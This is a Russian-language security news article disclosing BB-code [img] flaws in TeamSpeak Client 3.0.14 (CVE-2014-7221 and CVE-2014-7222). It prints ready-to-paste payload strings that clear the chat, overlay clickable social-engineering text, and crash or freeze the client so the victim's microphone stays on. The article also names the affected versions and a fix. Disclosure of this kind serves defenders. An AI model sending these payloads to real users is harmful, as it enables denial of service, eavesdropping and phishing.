Новость из категории: Информация

Переполнение буфера в Teamspeak Client v3.0.14

Содержание:
1. SQL-инъекции в Wordpress-плагине;
2. Переполнение буфера в Teamspeak Client v3.0.14 (Вы читаете данный раздел);
3. Нашумевший Shellshock.
CVSSv2: N/A
Дата релиза: 1 октября 2014 года
Автор: SpyEye, Christian Galeone
CVE: 2014-7221
CVE: 2014-7222

Переполнение буфера в Teamspeak Client v3.0.14

Думаю, многим читателям знакома программа для организации конференций TeamSpeak, которую взяли на вооружение как игроки в обычные компьютерные игры, так и различные хакерские CTF для взаимодействия внутри команды или клана. В TeamSpeak применяются различные ВВ-коды для более красивого оформления текста. В частности, один из таких кодов [IMG] используется в сообщениях, которые отправляются по всему серверу, отдельному каналу или лично отдельному пользователю. При обработке такого кода и нашлась ошибка, по-зволяющая или произвести DoS-атаку с некоторыми опасными нюансами, или применить некоторые особенности для успешной СИ-атаки (социальная инженерия).

EXPLOIT
Как уже было сказано, для воспроизведения различных случаев достаточно отправить сообщение на канал или отдельному пользователю. Рассмотрим, что можно сделать, используя этот тег.

Очистка или удаление чата:
[img][img]" width="999..." height="99...[/img][/img]

При наведении указателя мыши на чат появляется надпись YES. Можно добавить ссылку, по которой кликнет пользователь.
[url=#][img][img]" width="50" height="50" title="YES"
style="background-color:black;[/img][/img][/url]

Также мы можем рисовать изображения, используя CSS, или воспользоваться Base64 представлением изображения и отобразить интернетовский мем — тролля.

[img] [img]data: image/png; base64, iVBORw0KGgoAAAANSUhEUgAAAB4AAAAfCAIAAAB/
DupQAAAAAXNSR0IArs4c6QAAAARnQUlBAACxjwv8YQUAAAA3cEhZcwAADsMAAA7DAcdv
qGQAAAERSURBVEhL7ZZRDsMwCENz/lPlZHUKkZsE5pK/ev+tjQPY8y2drz2aq+Rj
w8N3qaGNPXaGoxAGlNStuohIkIliKtmU1303nx0Y0de2PoT3WPjfgyX/a2kwKkD39X2UO+
9FBW9qlWPpwfUuECPbjLUb4Enl2rjuthlyBBxVvPraIidRa957nAK0tjxSXU2EA4ACzc
bp+zGIchUgZXQjVufGgK6OHwitieVla3C509nwZCfC9N4ZaylcutiCuWQ0kXnLAILtBeqYa/
iABlUb6zcjgjyApEVO/jPbf4qXv02+n3LbKwBgiAqV/frnea0eAlbEI65D19ZhlPBAX
uIZh+k6RuGlN3oLDy7dufW9+83XPoBxFWD6ul6Bo8AAAAASUV0RK5CYII=[/img][/img]

Еще несколько вариантов от автора уязвимости можно найти на сайте, где она была опубликована (bit.ly/ZO79rC).
Ну и самые опасные варианты, которые приводят к падению или фризу приложения. Если пользователь в этот момент говорил, то у него останется включенным микрофон до того момента, как будет закрыто приложение или перевключен микрофон. Варианты тестировались на Windows 7.

Переполнение буфера в Teamspeak Client v3.0.14

CVE-2014-7221:
[img] [img]//http://www.teamspeak. com/templates/teamspeak_v3/images/
blank.gif [/img] [/img] [img] [img]//http://i.answers .micnosoft.com/static/
images/defaultuser75.png?ver=4.6.0.28[/img] [/img] [img] [img]//http://
i. answers. microsoft.com/static/images/defaultuser7a.png?ver=4.6.0.28[/
img][/img] [img][img]//http://i.answers.microsoft.com/static/images/
defaultuser7b.png?ver=4.6.0.28[/img] [/img] [img] [img]//http://i.answers.
microsoft. com/static/images/defaultuser75. png?ver=4.6.0.24[/img] [/img]
[img] [img]//http://i.answers.microsoft.com/static/images/defaultuser7z.
png?ver=4.6.0.28[/img][/img]

CVE-2014-7222:
[img][img]1z[/img][/img][img][img]2z[/img][/img][img][img]3z
[/img] [/img] [img] [img]4z[/img] [/img] [img] [img]5z[/img] [/img_]
[img[img]6z[/img][/img][img][img]7z[/img][/img][img][img]
8z[/img] [/img] [img] [img]9z[/img] [/img] [img] [img]10z
[/img][/img][img][img]11z[/img][/img][img][img]12z[/img][/img]
[img][img]13z[/img][/img][img][img]14z[/img][/img][img]
[img]15z[/img][/img][img][img]16z[/img][/img][img][img]17z
[/img][/img][img][img]18z[/img][/img][img][img]1z[/img][/img]
[img][img]2z[/img][/img][img][img]3z[/img][/img][img[img]4
z[/img][/img][img][img]5z[/img][/img][img[img]6z[/img][/img]
[img] [img]7z[/img] [/img] [img] [img]8z[/img] [/img] [img] [img]9z [/img][/img][img][img]10z[/img][/img][img][img]11z[/img]
[img] [img]10z[/img] [/img] [img] [img]11z[/img] [img] [img]10z[/img]
[/img] [img] [img]11z[/img] [/img] [img] [img]12z[/img] [/img] [img] [img]13z[/img][img][img]12z[/img][/img][img][img]13z[/img][/img]

TARGETS
TeamSpeak Client <= 3.0.14.

SOLUTION
Есть исправление от производителя, или можно воспользоваться Lua-плагином anti-freeze (bit.ly/Zpzsfp).

Рейтинг статьи

Оценка
5/5
голосов: 1
Ваша оценка статье по пятибальной шкале:
 
 
   

Поделиться

Похожие новости

Комментарии

^ Наверх